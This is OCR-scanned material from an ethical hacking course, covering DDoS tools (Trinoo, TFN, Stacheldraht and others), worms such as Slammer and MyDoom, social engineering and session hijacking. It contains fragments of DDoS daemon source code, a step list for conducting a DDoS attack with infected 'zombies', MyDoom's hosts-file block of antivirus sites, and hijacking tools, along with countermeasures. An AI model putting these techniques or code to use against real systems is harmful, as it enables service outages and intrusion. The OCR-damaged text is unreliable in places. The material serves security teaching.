Packet Loiit^l. 




11:30 13:40 15:50 18:00 20:10 22:20 00:30 02:40 0450 07:00 03:10 11:20 
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DDoS Attack Taxonomy 



DDoS Attacks 
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Amplification Attack 
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©TrinOO 

©Tr i be F I ow N etwork 
(TFN) 

©TFN2K 

©Stacheldraht 

©Shaft 

©Trinity 

©Knight 

©M stream 

©Kaiten 




Zombies 



Victim 



Classic tools presented for proof of concept 
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© TrinOO is credited with being the first DDoS attack tool 
to be widely distributed and used 

© A distributed tool used to launch coordinated UDP 
flood denial of service attacks from many sources 

© The attacker instructs the Trinoo master to launch a 
denial of service attack agai nst one or more I P 
addresses 

© The master i nstructs the daemons to attack one or more 
I P addresses for a specified period of ti me 

© Typically, thetrinOO agent gets installed on a system 
that suffers from remote buffer overrun exploitation 

Classic tool presented for proof of concept 
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DDoS Tool: Tribal Flood Network 



L 

© P rovi des the attacker wi th the abi I i ty to wage both 
bandwidth depletion and resource depletion attacks. 

©TFN tool provides for UDP and I CMP flooding, as well 
as TCP SYN, and Smurf attacks. 

©The agents and handlers communicate with 
I CM P_ ECH 0_ REPLY packets. These packets are harder 
to detect than UDP traffic and have the added ability of 
being able to pass through firewalls. 

Classic tool presented for proof of concept 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 




File Edit Format Help 

/'^ td.c - tribe flood network daemon 
(c) 1999 by Mixter - PRIVATE V 

#include "config.h" 
#include "tubby. h" 
#include "control. h" 
#i ncl ude "syn. c" 
#include "udp.c" 
#1 ncl ude "icmp.c" 



char buf[1024], target [1024] , answer [1024] ; 
struct iphdr *ip = (struct iphdr buf; 

struct icmphdr ^'icmp = (struct icmphdr (buf + sizeof (struct iphdr)); 
char *'p = (buf + sizeof (struct iphdr) + sizeof (struct icmphdr)); 
int Isock, i, whereami, port4syn = 0; 

if (geteuid ()) 

exit (-1); 
strcpy (fart[0], hideme); 
Isock = socket (af_inet, sock_raw, 1); 
close (0); 
close (1); 
close (2); 
if (fork ()) 

exit (0); 

signal (SIGHUP, SIG_IGM); 
signal (sigterm, sig_ign); 
signal (SIGCHLD, SIG_IGN); 

while (1)1 

i = read (Isock, buf, 1024); 



. int 

(main (int puke, char **'fart) 
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© Based on the TFN architecturewith features designed 
speci f i cal I y to make T F N 2 K traff i c d i ff i cu 1 1 to recogn i ze 
and filter 

© Remotely executes commands, hides the true source of 
the attack usi ng I P address spoof i ng, and transports 
TFN2K traffic over multiple transport protocols 
i ncl udi ng U DP, TCP, and I CM P 

© UNIX, Solaris, and Windows NT platforms that are 
connected to the Internet, directly or indirectly, are 
susceptible to this attack 

Classic tool presented for proof of concept 
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I 




File Edit Format Help 



" Tribe FloodNet - 2k edition 
*' by iHixter <mi xter©newyorkoff i ce. com> 



■u 



td.c - tribe flood server 

This program is distributed for educational purposes and without any 
explicit or implicit warranty; in no event shall the author or 
*' contributors be liable for any direct, indirect or incidental damages 
arising in any way out of the use of this software. 



#include "tribe. h" 

extern int fwOOding, nospoof, port4syn, psize; 
extern unsigned long myip; 

extern void security_tnr ough_obscurity (int); 
void tribe_cmd (char, char char 
i nt 

main (int argc, char *'*'argv) 

char buf[BS], clear[BS]; 

struct ip *iph = (struct ip buf; 

struct tribe *tribeh = (struct tribe clear; 

int isock, tsock, usock, i; 

char *'p = NULL, ^data = (clear + sizeof (struct tribe;);); 
fd_set rfds; 

isock = socket (AF_IMET, SOCK_RAW, ICMP); 

tsock = socket (af_imet, sock_raw, tcp); 
usock = socket (af_imet, sock_raw, udp); 

if (geteui d (;);) 
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DDoSTool: Stacheldraht 



I 



© German for "barbed wire," it is a DDoS attack tool based on earlier 
versions of TFN. 

© Like TFN, it includes I CMP flood, U DP flood, and TCP SYN attack 
options. 

© Stacheldraht also provides a secure telnet connection via 
symmetric key encryption between the attacker and the handler 
systems. This prevents system administrators from intercepting 
this traffic and identifying it. 
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Classic tool presented for proof of concept 
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DDoSTool: Shaft 



I 



© It is a derivative of the trinOO tool which uses U DP 
communication between handlers and agents. 

© Shaft provides statistics on the flood attack. These 
statistics are useful to the attacker to know when the 
victi m system is completely down and al lows the 
attacker to know when to stop adding zombie machines 
to the DDoS attack. Shaft provides U DP, I CM P, and 
TCP flooding attack options. 

© One interesting signature of Shaft is that the sequence 
number for all TCP packets is 0x28374839. 
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Classic tool presented for proof of concept 
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DDoS Tool: Trinity 



© Tri nity appears to use pri mari ly port 6667 and also has 
a backdoor program that listens on TCP port 33270. 

© Tri ni ty has a wi de vari ety of attack opti ons i ncl udi ng 
UDP, TCP SYN, TCP ACK, and TCP NUL packet floods 
as well as TCP fragment f I oods, TCP RST packet floods, 
TCP random flag packet floods, and TCP established 
floods. 

© It has the ability to randomize all 32 bits of the source 
I P address. 

Classic tool presented for proof of concept 
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DDoSTool: Trinity 



jmaster.c - Notepad 



File Edit Format Help 



#ifdef CRYPTKEY 

char *encrypt_stri ngCchar 
char *decrypt_stri ngCchar 
#endif 



char "')■, 
char *'); 



mainCint argc, char "^argvC]^ 

struct 50ckaddr_in master, from, tcpmast, tcpconn; 

"int sock, sock2, fromlen, numread, bewm=0, auth, maxfd, alt; 

int list=l, 1, "Poke, hoe, blist, argi, □utport=27444 , ttout=300, i d1 e=0; 

int pongr=0; 

FILE *'out; 

char buf[1024], outbuf [1024] , old, comm[15], *'argl; 
char pass [8], ^uptime, *'dec, *'enc; 
long lookip; 
fd_set myfds; 

time_t now, hr, min, onlineat; 
struct timeval tv; 
struct hostent *'he; 
old = 0 - 28; 

if CargvEl]) {if (strcmpCargv [1] , " v")==0){pri ntfC'tri noo %s\n" , version;) ; exit CO) ; }} 

sprintf (pass, "l44adsl"); 

if CCsock = socket Caf_i NET, sock_dgrajwi, ipproto_udp)) == -1) { 
perror C'sock ") ; 
exitC-1); 

} 

if C(;sock2 = socket CAF_I MET, SOCK_STREAM, 0)) == -1) { 

perror ("sock ") ; 
exitC-1); 

} 

printfC"?? "); 
fgetsCbuf, 1024, stdin); 
buf [strlenCbuf) - 1] = 0; 

if CstrcmpCCchar *') crypt Cbuf, "On"), "OnmlVNMXqRMyiwi") I =0) { 
exitC-1); 

} 

1] I 
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DDoSTool: Knight and Kaiten 



© Knight: 

• I RC-based DDoS attack tool that was fi rst reported i n J uly 2001 

• It provides SYN attacks, UDP Flood attacks, and an urgent pointer flooder. 

• Can be installed by using a Trojan horse program called Back Orifice. 

• Knight is designed to run on Windows operating systems. 

© Kaiten: 

• Another I RC- based D DoS attack tool . 

• I s based on Knight, and was fi rst reported i n August of 2001 

• Supports a variety of attacki ng features. 1 1 i ncl udes code for U DP and TCP floodi ng 
attacks, for SYN attacks, and a PUSH +ACK attack. 

• 1 1 also randomizes the 32 bits of its source address. 



Classic tools presented for proof of concept 
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DDoSTool: M stream 



©Uses spoofed TCP packets with the ACK flag set to attack 
the target 

© M stream tool consists of a handler and an agent portion, 
nnuch like previously known DDoS tools such asTrinoo 

© Access to the handler is password protected 

© The apparent i ntent for 'stream' is to cause the handler to 
instruct all known agents to launch a TCP ACK flood 
against a single target I P address for a specified duration 
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Classic tool presented for proof of concept 
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Scenario 



I 



1 

2. 



A few hours after the launch of 
the e-business paper, DDoS 
attacks crippled the website. 
Continuous bogus requests 
flooded the website and 
consumed all recourses. Experts 
conf i rmed that thousands of 
compromised hosts were 
deployed to unleash the attack. 

H ow does Sam react to the 
situation? 

Esti mate the I oss of Goodwi 1 1 
caused by the attack. What are 
the busi ness i mpl i cati ons? 

H ow can one prevent such 
attacks? What are the proactive 
steps involved? 
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The Reflected DoS Attacks 




Target/ Victim Networl< 

, ^^^^^^^^^^^^^ Copyright © by BC-Cbunci I 
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Reflection of the Exploit 



© TCP three-way handshake vulnerability is exploited 

© The attacki ng machi nes send out huge vol umes of SYN 
packets but with the I P source address poi nti ng to the 
target nnachine 

© Any general-purpose TCP connection- accepting 
I nternet server could be used to reflect SYN packets. 

© For each SYN packet received by theTCP reflection 
server, up to four SYN/ACK packets will generally be 
sent 

© 1 1 degrades the performance of the aggregati on router 



BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Counter measures for Reflected DoS 



1 

© Router port 179 can be blocked as a reflector 

© Blocking all inbound packets originating from the 
servi ce port range wi 1 1 bl ock most of the traff i c 
being innocently generated by reflection servers 

© I SPs could prevent the transmission of fraudulently 
addressed packets 

© Servers could be programmed to recognize a SYN 
source I P address that never completes its 
connections 
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DDoS Countermeasures 



DDoS Countermeasures 
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Taxonomy of DDoS Countermeasures 



I 



© Three essential components: 

• Prevent! ng secondary victi ms and detect! ng 
and neutralizing handlers 

• Detecti ng or preventi ng the attack, 
mitigati ng or stoppi ng the attack, and 
def I ecti ng the attack 

• The post-attack component which i nvol ves 
network forensics 
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Preventi ng Secondary Victi ms 



I 

© A heightened awareness of security issues and 
prevention techniques from all I nternet users 

© Agent programs should be scanned for in the systems 

© I nstal I i ng anti - vi rus and anti -Troj an software and 
keepi ng these up to date can prevent i nstal I ati on of the 
agent programs 

© Daunti ng for the average "web-surfer," recent work has 
proposed built-in defensive mechanisms in the core 
hardware and software of computi ng systems 
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Detect and Neutralize Handlers 



© Study of communication protocols and traffic patterns 
between handlers and clients or handlers and agents 
in order to identify network nodes that might be 
infected with a handler 



© There are usually few DDoS handlers deployed as 
compared to number of agents. So neutralizing a few 
handlers can possibly render multiple agents useless, 
thus thwarting DDoS attacks 
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Detect Potential Attacks 



© Egress filtering 

• Scanni ng tlie pacl<et lieaders of I P pacl<ets leavi ng a 
networl< 

© Tliere is a good probabi I ity tliat tlie spoofed source 
address of DDoS attack packets wi 1 1 not represent a 
val id source address of the specific sub- network 

© Placing a firewall or packet sniffer in the sub- network 
that filters out any traffic without an originating I P 
address 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



M itigate or Stop the Effects of DDoS 
Attacks 



© Load Balancing 

• Providers can increase bandwidth on critical 
connections to prevent them from going down in the 
event of an attack 

• Replicating servers can help provide additional 
failsafe protection 

• Balancing the load to each server in multiple- server 
architecture can improve both normal performances 
as wel I as mi ti gate the effect of a DDoS attack 

© Throttling 

• This method sets up routers that access a server with 
I ogi c to adj ust (throtti e) i ncomi ng traff i c to I evel s 
that wi 1 1 be safe for the server to process 
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©Honeypots 

• Systems that are 
set up with limited 
security to be an 
enticement for an 
attacl<er 

• Serve as a means 
for gaining 
information about 
attacl<ers by 
storing a record of 
their activities and 
learning what 
types of attacks 
and software tools 
the attackers used 
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Post- Attack Forensics 



I 



© Traffic pattern analysis 

• Data can be analyzed, post-attack, to look for specific 
character i sti cs wi thi n the attacki ng traff i c 

© This characteristic data can be used for updating 
load balancing and throttling countermeasures 

© DDoS attack traffic patterns can help network 
ad mi nistrators develop new fi Iteri ng techniques for 
preventi ng it from enter i ng or leavi ng thei r networks 
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Packet Traceback 



© This al lows back trad ng the attacker's traffic and 
possi biy i dentifyi ng the attacker 

© Additionally, when the attacker sends vastly different 
types of attacki ng traffic, this nnethod assists i n 
providing the victim system with information that 
mi ght hel p devel op f i Iters to bl ock the attack 

© Event Logs: 

• 1 1 keeps logs of the DDoS attack i nformation i n order to do a 
forensic analysis and to assist law enforcement in the event the 
attacker does severe financial damage 
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Worms 



Worms are disti ngui shed from vi ruses i n the fact that a vi rus requi res 
some form of human intervention to infect a computer whereas a worm 
does not 
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SlAllSllCS: 
I>el£T|r- & UopG: 
fii^raj; I26I 
Overflow: 0 
(Jiide^ow: 0 

79.Sjra 
79.9jra 
S4.7m3 
8Q.67ra 
2.47ra 



15 Perc. 
ASedimi . 
97.5 Perc. 

RMS. 



Mm. hops: II 
Max. hops: 28 



Pcickets sent/vaUd: 

Joud: 1595 
Vahd: 1-261= 79.1^ 
Serd bad: 0=0^ 
Recv bad: 0=0^ 
2 docks bad: 0 = 0^ 
Loss: 334 = 21 % 



PcHckets ktst: 

15 Fcrc: Q0% 
.Mcditm: Q0% 
97.5 Fctt: 100.0% 
Uyti)y,c: 100 % 



Over-^nll statistic: 

Tinrc ycriod : Odtiy 

.dumber of routing 
vectors: 13 
flaps: 19 

.dumber of bins: 16S 
A timi tcs/ biji : 3.2 



Source: 

http:/ / www. ri pe. net/ ttm/ 
worm/ ddos2.gif 
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Slammer Worm 



© A worm target! ng SQL Server computers that is a self- 
propagating malicious code, which exploits the 
vul nerabi I ity that al lows for the executi on of arbitrary 
code on the SQL Server computer due to a stack 
buffer overf I ow. 

© The worm wi 1 1 craft packets of 376 bytes and send 
them to randomly chosen I P addresses on port 
1434/ udp. I f the packet is sent to a vul nerabi e 
machi ne, thi s vi cti m machi ne wi 1 1 become i nfected 
and will also begin to propagate. 

© Compromi se by the worm conf i rms a system i s 
vul nerabi e to al I owi ng a remote attacker to execute 
arbitrary code as the local SYSTEM user. 
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Spread of Slammer Worm - 30 min 



I 



©The Slammer worm (also known as 
the Sapphi re worm) was the fastest 
worm in history— it doubled in size 
every 8.5 seconds at its peak 

©From the time it began to infect 
hosts (around 05:30 UTC) on 
Saturday, J an. 25, 2003, it managed 
to infect more than 90 percent of the 
vulnerable hosts within 10 minutes 
usi ng a wel I- known vul nerabi I i ty i n 
M icrosoft's SQL Server 

©Slammer eventually infected more 

than 75,000 hosts, flooded networks 

all over the world, caused 

di srupti ons to f i nanci al i nsti tuti ons, 

ATMs, and even an election in 

Canada 



BC-Council 




Source: 

http://www.pbs.org/ wgbh/ pages/ f ronti i ne/ shows/ cyberwar/ warni n 
gs/ si ammermapnof I ash . html 
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MyDoom.B 



© MYDOOM.B variant is a mass- mailing worm 

© On P2P networl<s, W32/ MyDoom.B may appear as a file 
named {attacl<XP-L26, Black! ce Firewall 
Enterpriseacti vation crack, M SD4-01_ hotFix, 
NessusScan_pro, icq2004-final, winampS, 
xsharez_ scanner, zapSetup_40_148}.{exe, scr, pif, bat} 

© 1 1 can perform DoS agai nst www.sco.com and 
www.microsoft.com 

© 1 1 has a backdoor component and opens port 1080 to 
al I ow remote access to i nfected machi nes. 1 1 may also 
use ports 3128, 80, 8080, and 10080 

© 1 1 runs on Windows 95, 98, ME, NT, 2000, and XP 
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MyDoom.B 



I 



© The vi rus overwrites the host fi le (%wi ndi r%\ system32\ dri vers\ etc\ hosts on Wi ndows 
NT/ 2000/ XP, %wi ndi r%\ hosts on Windows 95/98/ M E) to prevent DNS resolution for a 
number of sites, including several antivirus vendors effecting a Denial of Service. 

© 127.0.0.1 I ocal host local host, local domain local 1 0 

0.0.0.0 0.0.0.0 

0.0.0.0 enqine.awaps.net awaps.net www.awaps.net ad.doubleclick.net 

0.0.0.0 spa.atdmt.com atdmt.com click.atdmt.com clicks.atdmt.com 

0.0.0.0 medi a.fastcl i ck. net fastcl i ck. net www.fastcl i ck. net ad.fastcl i ck. net 

0.0.0.0 ads.fastclick.net banner.fastclick.net banners.fastclick.net 

0.0.0.0 www.sophos.com sophos.com ftp.sophos.com f-secure.com www.f-secure.com 

0.0.0.0 ftp.f-secure.com securityresponse.symantec.com 

0.0.0.0 www.symantec.com symantec.com servicelsymantec.com 

0.0.0.0 liveupaate.symantec.com update.symantec.com updates.symantec.com 

0.0.0.0 support.microsoft.com downloads.microsoft.com 

0.0.0.0 download.microsoft.com windowsupdate.microsoft.com 

0.0.0.0 office.microsoft.com msdn.microsoft.com go.microsoft.com 

0.0.0.0 nai.com www.nai.com vil.nai.com secure.nai.com www.networkassociates.com 

0.0.0.0 networkassociates.com avp.ru www.avp.ru www.kaspersky.ru 

0.0.0.0 www.viruslist.ru viruslist.ru avp.ch www.avp.ch www.avp.com 

0.0.0.0 avp. com us. mcaf ee. com mcaf ee. com www. mcaf ee. com d i spatch . mcaf ee. com 

0.0.0.0 download.mcafee.com mast.mcafee.com www.trendmicro.com 

0.0.0.0 www3.ca.com ca.com www.ca.com www.my-etrust.com 

0.0.0.0 my-etrust.com ar.atwola.com phx.corporate-ir.net 

0.0.0.0 www.microsoft.com 



© On Februarys, 2004, W32/MyDoom.B removes the entry for www.microsoft.com. 
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MyDoom.B 

-^Symantec Security Response - W32.MydDDm.A@>mm - MicrDsoft Internet Explorer 
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tlireat assessment teclinlcai details 



lecoTnmenfiatlons 



Due to a decreased rate of submissions, Symantec Security 
Response has downgraded this threat from a Category 3 to a 
Category 2 rating as of March 30, 2004. 

W32.IV1ydoom.A@mm (also l<nown as VV32.Novarg.A) is a mass- 
mailing worm that arrives as an attachment with the file 
extension .bat, .cmd, .exe, .pif, .scr, or. zip. 

When a computer is infected, the worm sets up a backdoor into the 
system by opening TCP ports 3127 through 3198, which can 
potentially allow an attacker to connect to the computer and use it 
as a proxy to gain access to its network resources. 

In addition, the backdoor can download and execute arbitrary files. 

There is a 25% chance that a computer infected by the worm will 
perform a Denial of Service (DoS) on February 1 , 2004 starting at 
16:09:10 UTC, which is also the same as 00:09:18 PST, based on 
the machine's local system date/time. If the worm does start the 
DoS attack, it will not mass mail itself It also has a thgger date to 
stop spreading/DoS-attacking on February 12, 2004. While the 
worm will stop on February 12, 2004, the backdoor component will 
continue to function after this date. 



removal instructions 



this problem, 
get the 
removal tool. 
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H ow to Conduct DDoS Attack 



I 



step L Write a vi rus that wi 1 1 send pi ng pacl<ets 
to a target network/ websites 

Step 2. 1 nfect a minimum of (30,000) computers 
with this virus and turn them into "zombies" 

Step 3. Trigger the zombies to launch the attacl< 
by sending wal<e-up signals to the zombies 
or activated by certai n data 

Step 4. The zombies wi 1 1 start attacki ng the target 
server until they are disinfected 
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Summary 



© DoS attacks can prevent the usage of the system by its 
legiti mate users by overloadi ng the resources. 

© It can result in disabled network, disabled organization, 
financial loss, and loss of goodwill. 

© Smurf, Buffer overflow. Ping of death. Teardrop, SYN, 
and Tri bal F I ow Attacks are some of the types of DoS 
attacks and WinNuke, Targa, Land, and Bubonic.c are 
some of the tools used to achieve DoS. 

© A DDoS attack is one in which a multitude of 
compromised systems attack a single target. 
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Summary 



© There can be Bandwidth depletion or 
Amplification DDoS attacks. 

© TrinOO, TFN, TFN2K, Stacheldraht, Shaft, and 
Tri nity are some of the DDoS attack tools. 

© Counter measures include preventing secondary 
victims, detecting and neutralizing handlers, 
detecti ng or preventi ng the attack, mitigati ng or 
stoppi ng the attack, and deflecti ng the attack. 



B3-Council 



Copyright © byC-Council 
All Rights reserved. Reproduction isstrictiy proiiibited 




Ethical Hacking 



Module IX 

Social Engineering 



Module Objective 



■ 



© What is Social Engineering? 
© Common Types of Attacl<s 
© Social Engineering by Phone 
© Dumpster Diving 
© Online Social Engineering 
© Reverse Social Engineering 
© Policies and Procedures 
© Employee Education 
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Module Flow 




I — Reverse Social Engineering ^ 



Computer- Based 
Social Engineering 
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What is Social Engineering? 



© Social Engineering isthehuman sideof breaking into 
a corporate networl< 

© Companies with autlienti cation processes, firewalls, 
virtual private networks, and network monitoring 
software are sti 1 1 wi de open to attacks. 

© An employee may unwi tti ngly give away key 
information in an email or by answering questions 
over the phone with someone they don't know or even 
by tal ki ng about a project with coworkers at a local 
pub after hours. 
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Art of Manipulation 



■ 



© Social Engineering istheacquisition of sensitive 
i nformati on or i nappropri ate access pri vi I eges by an 
outsider, based on building of inappropriate trust 
relationships with outsiders 

© The goal of a soci al engi neer is to tri ck someone i nto 
provi di ng val uabi e i nformati on or access to that 
information 

© It preys on qualities of human nature, such as the desire 
to be helpful, the tendency to trust people, and the fear 
of getting in trouble 
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Human Weakness 



© People are usually the 
weakest link in the 
security chain 

© A successful defense 
depends on having good 
po iciesin place and 
educati ng employees to 
follow the policies 

© Social Engineering is the 
hardest form of attack to 
defend against because it 
cannot be defended with 
hardware or software 
alone 
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Common Types of Soci al E ngi neeri ng 



© Social Engineering can 
be brol<en i nto two types: 
human based and 
computer based 

L Human-based Social 
E ngi neeri ng refers to 
Derson- to- person 
nteraction to retrieve the 
desired information 

2. Computer-based 
Social Engineering refers 
to havi ng computer 
software that attempts to 
retrieve the desi red 
information 
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H uman-Based - 1 mpersonation 



H u man- based social 

engi neeri ng techni ques can 

be broadly categorized i nto: 

© Innpersonation 

© Posi ng as I mportant User 

© Third- person Approach 

© Technical Support 

© I n Person 

• Dumpster Diving 

• Shoulder Surfing 
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Example 




A man calls a company help desk and 
says he's forgotten his password. 




In a panic, he adds that If he misses the 
deadline on a big advertising project his 
boss might «ven fire him. 

The help desk worker feels sorry for him 
and quickly resets the password - 
unwittingly giving: the hacker clear 
entrance Into the corporate network. 
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A man is in back of the building 
loading the company's paper recycling 
bins into the back of a truck. Inside 
the bins arc lists of employee titles 
and phone numbers, marketing plans 
and the latest company f inancials. 

This information is sufficient to 
launch social engineering attack on 
the companyp 
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Computer- Based Social Engineering 



© These can be divided 
into the foil owing 
broad categories: 

• Mail / IM attach nnents 

• Pop-up Windows 

• Websites/ 
Sweepstakes 

• Spannnnail 



I 



Message Edit View Format Options Tools 



Send Expre55 Queue Save Attach Headers Spell Check Check Adt 



r 



Subject: |cool Photo of Anna KournikDva 



How was VDur holidays^ Please take a look at the censored Anna 
Kournikova Image. 

Best regards. 



H'ojan 
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Reverse Social Engineering 



■ 



© M ore advanced method of gaining illicit information is 
known as "reverse social engineering" 

© This is when the hacker creates a persona that appears 
to be i n a position of authority so that employees wi 1 1 
ask hi m for i nformation, rather than the other way 
around 

© The three parts of reverse social engi neeri ng attacks are 
sabotage, advertising, and assisting 
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I 



M ary has cracked J anie's password ! ! ! ! 

Shedid not even useasystenn. All shedid was use social engineering on 
J anie. That day, in the afternoon, Mary came to find outthatj anie, her 
col I eague, had stored sonne i nnportant cl i ent f i I es i n her nnai I box. M ary 
wanted that cl lent I ist as she could easi ly meet the sales target with the 
hel p of that i nf ormati on . 

M ary and J anie were worki ng as sales managers for al most 5 years i n the 
organization and so they knew each other well. Mary asked J anie to meet 
her at a restaurant that eveni ng for an i nformal chat session. U naware of 
M ary's i ntentions, J anie agreed to come. 

At the restaurant, Mary asked some personal questions which could help 
her in cracking] anie's password. And it really helped. I n the course of 
thei r conversation, J anie revealed her secret password to M ary. 

J ust thi nk about what J anie wi 1 1 face after M ary cracks i nto her 
mai I box to make matters worse, she may even have identity crisis. 
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© Policy is the most critical component to any information 
security program. 

© Good policies and procedures are not effective if they 
are not taught to and rei nforced by the employees. 

© E mpl oyees need to be taught to emphasi ze thei r 
i mportance. After recei vi ng trai ni ng, the employee 
should sign a statement acknowledging that they 
understand the policies. 
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© Account setup 
© Password change pol i cy 
© Help desk procedures 
© Access privileges 
© Violations 

© Employee identification 
© Privacy policy 
© Paper documents 
© Modems 

© Physical access restrictions 
© Virus control 



necklist 
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Summary 



© Social Engineering is the human side of breaking into a 
corporate networl< 

© Social Engineering involves acquiring sensitive 
information or inappropriate access privileges by an 
outsider 

© H uman-based Social Engineering refers to person-to- 
person interaction to retrieve the desired information 

© Computer- based Soci al E ngi neeri ng refers to havi ng 
computer software that attempts to retrieve the desi red 
information 

© A successful defense depends on having good policies in 
place and diligent implementation 
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Ethical Hacking 



Module X 
Session Hijacking 



Scenario 



I 



N i ck works as a trai nee at the purchasi ng 
department of a manufacturi ng plant. M ost 
transact! ons are done online through sessi ons 
with the vendors. 

H e had high job expectations and slogged for 
hours in thehopeof getting a better job role. His 
boss was i ndifferent to his hard work and was 
more i nf I uenced by the sycophants. After a year, 
all his colleagues got promoted. Nick was 
flustered. He decided that it was payback time 
for his boss... 




Picture Source: 

http:/ / benj ami n . hodgens. ne 

t/blak^geek.j pg 
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Module Objective 



© Spoofing VS. Hijacking 

© Types of Session H ijacl<i ng 

© TCP/ 1 P Concepts 

© Performing Sequence Prediction 

© ACK Storms 

© Session Hijacl<ing Tools 
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Module Flow 



Understanding 
gssiorUHjiackin^ 
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Sessi on H i j acki ng Steps 



► Session Hijacking Tools 



Countermeasures 
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L J 



Understanding 



© Understanding the flow 
of message packets over 
the I nternet by dissecti ng 
the TCP stack. 

© Understanding the 
security issues involved 
i n the use of I Pv4 
standard. 

© Familiarizing with the 
basic attacks possi ble 
due to the I Pv4 standard. 
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;sion Hijacking 



I 



Virtual Connection 



Application Layer 



Transport Layer 



Network Layer 



Data Link Layer 



D 
E 



T 
I 



C 
A 
L 



Application Layer 



Transport Layer 



Network Layer 



Data Link Layer 



Hardware J Q Hardware 

Actual Connection 
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Spoof i ng vs.H ijacki ng 



A spoofing attack is 
different from a hijacl< in 
that an attacl<er is not 
actively tal<ing another user 
off I i ne to perform the 
attacl<. H e pretends to be 
another user or machine to 
gai n access. 
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Spoof i ng vs. H i j acki ng 



With hijacking, an attacl<er 
i s tal<i ng over an exi sti ng 
session, which means he is 
relying on thelegiti mate 
user to mal<e a connection 
and authenticate. After 
that, the attacl<er tal<es over 
the session. 
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steps in Session H ijacl<ing 



1 Tracki ng the sessi on 

2. Desynchronizi ng the connecti on 

3. I nj ecti ng the attacker's packet 
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Types of Sessi on H i j acki ng 



There are two types of sessi on hi j acl<i ng attacl<s: 
© Active 

• I n an active attack, an attacker f 1 nds an active 
session and takes over. 

© Passive 

• With a passive attack, an attacker hijacks a session, 
but sits back and watches and records all the traffic 
that is being sent forth. 
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The 3- Way H andshake 




SYN 

Seq.:4000 



SYN/ACK 

Seq:7000,Ack: 4001 



ACK 

Ack:7001 





SERVER 



BOB 



I f the attacker can anticipatethe next number Bob will send, hew! 
spoof Bob's address and start connnnunication with the server. 
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TCP Concepts 3- Way H andshake 



Bob initiates a connection witli tlie server. 
Bob sends a pacl<et to tlie server witli the 
SYN bit set. 

The server receives this packet and sends 
back a packet with the SYN bit and an I SN 
(I nitial Sequence Number) for the server. 

Bob sets the ACK bit acknowledging the 
recei pt of the packet and i ncrements the 
sequence number by 1 

The two machines have successfully 
established a session. 
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Sequence Numbers 



©Sequence numbers are i mportant i n providing reliable 
communication and also crucial for hijacking a session. 

©Sequence numbers are a 32- bit counter. Therefore, the 
possible combinations can beover 4 billion possibilities. 

©The sequence numbers are used to tel I the recei vi ng 
machi ne what order the packets should go i n when they are 
received. 

©Therefore, an attacker must successfully guess the 
sequence number in order to hijack a session. 
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Programs That Perform Session H ijacking 



There are several programs 
avail able that perform session 
hijacking. 

F ol I owi ng are a few that bel ong 
in this category: 

J uggernaut 

Hunt 



TTY Watcher 
I P Watcher 
T- Sight 
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H acki ng Tool : J uggernaut 



© http://www.IOt3k.orci/tools/Spoofinci/L2.tar.gz 

© J uggernaut is a networl< sniffer tliat can be used to 
liijacl<TCP sessions. It runs on Linux operating 
systenns. 

© J uggernaut can be set to watcli for all network traffic 
or it can be given a keyword (e.g. a password ) to 
look out for. 

© The obj ecti ve of thi s program i s to provi de 
information about ongoing network sessions. 

© The attacker can see all the sessions and choose a 
session to hijack. 
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Hacking Tool: Hunt 



http:// 1 i n.fsid.cvut.cz/ ^kra/ i ndex.html 

© H unt is a program that can be used to I isten, i ntercept, 
and hijack active sessions on a network. 

© Hunt offers: 

I 

• Connection management 

• ARP spoofing 

• Resetting connection 

• Watching connection 

• MAC address discovery 

• Sniffing TCP traffic 
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H acki ng Tool : TTY Watcher 



htt p :/ / www. cer i as. purdue.edu 

© TTY-watcher is a utility to monitor and control users on 
a single system. 

© Shari ng a TTY. Anythi ng the user types i nto a 

monitored TTY wi ndow wi 1 1 be sent to the underiyi ng 
process. I n this way, you are sharing a login session 
with another user. 

© After a TTY has been stolen, it can be returned to the 
user as though nothing happened. 

(Aval I able only for Sun Solaris Systems.) 
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H acki ng Tool : I P Watcher 



http://engarde.conn 

©I P watcher is a commercial session 
hijacking tool that allows you to 
monitor connections and has active 
f aci I i ti es for taki ng over a sessi on . 

©The program can monitor all 
connections on a network allowing 
an attacker to display an exact copy 
of a sessi on i n real -ti me, j ust as the 
user of the sessi on sees the data. 











iPWatcJiM 






f Loc^il IP: 127.0.0.1 






Hostname : iter 




m 


IP KEEPER "^^Effacer"^ 1 




iTraduit par Alternatif 






1 www.groupalternatif.fr.st 






lgroupalternatif@fr.s 
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T- Sight 



http : / / en gar d e. com 

©T-Sight, an advanced intrusion 
investigation and response tool 
for Windows NT and Windows 
2000, can assist you when an 
attempt at a break- i n or 
compromise occurs. 

©With T-Sight, you can monitor 
all your network connections (i.e. 
traffic) in real-time and observe 
the composition of any suspicious 
acti vi ty that takes pi ace. 

©T-Sight has the capability to 
hijack any TCP sessions on the 
network. 

©Due to security reasons, 
E nqarde Systems I i censes thi s 
sofEwareto pre-determined I P 
addresses. 
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Connection Data: 192. 168.200.92 [1056] <-> 192.168.200,98 [23] 



tdit 

C;\> 
C;\>dii: 

Volume in drive C has no label. 
Volume Serial Number is ABEE-E1S2 



Directory of C;\ 



01/13/2000 
02/21/2004 
01/13/2000 
03/23/2004 
01/15/2000 
09/23/2003 
11/15/2002 
03/24/2004 
03/24/2004 
01/30/2004 
01/13/2000 
11/15/2002 
01/13/2000 
01/22/2004 



I 



50p 8,820,072 aorobatS.eKe 

24p <DIR> Documents and Settings 

52p <DIR> Inetpub 

Up <DIR> Hy IJeb Sites 

13a <DIR> OOo_l,lrc4Jin32IntBl_install 

48p 66,483, 630 00o_l, lrc4Jin32IntBl_install, zip 

34a <DIR> Program Files 

54p 0 readme, tKt 

12p <DIR> string 

18p <DIR> temp 

06p <DIR> ijin21c_drivers 

40a <DIR> UIIIT 

50p 1,803,848 UinzipSl.eKe 

55a <DIR> UUTemp 

4rile(s) 77,107,550 bYtes 
10 Dir(s) 2,355,388,416 bytes free 



C;\> 



gA;A;pApAp^ApAp^;s;A,j^202\210\340\377\373^X\377\372"XfflSI\377\360^rj^rJdir"rj 



jn|x| 



LP: 00:16:52 
12/15/02 

Status: 
Active 

Countermeasures- 
Terminate | 
Take Over 
I No Macros ^ 
Send (Client) | 
Send (Server) 
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T- Sight 



I 



T-sight Realtime 



File Edit View Report Help 
Protocols Connections 



itelnet[231/tc 



domain[B3], 
netbios-ns[ 
netbios-dgr 



J_L 



start Dt j Start Tm ] End Dt 



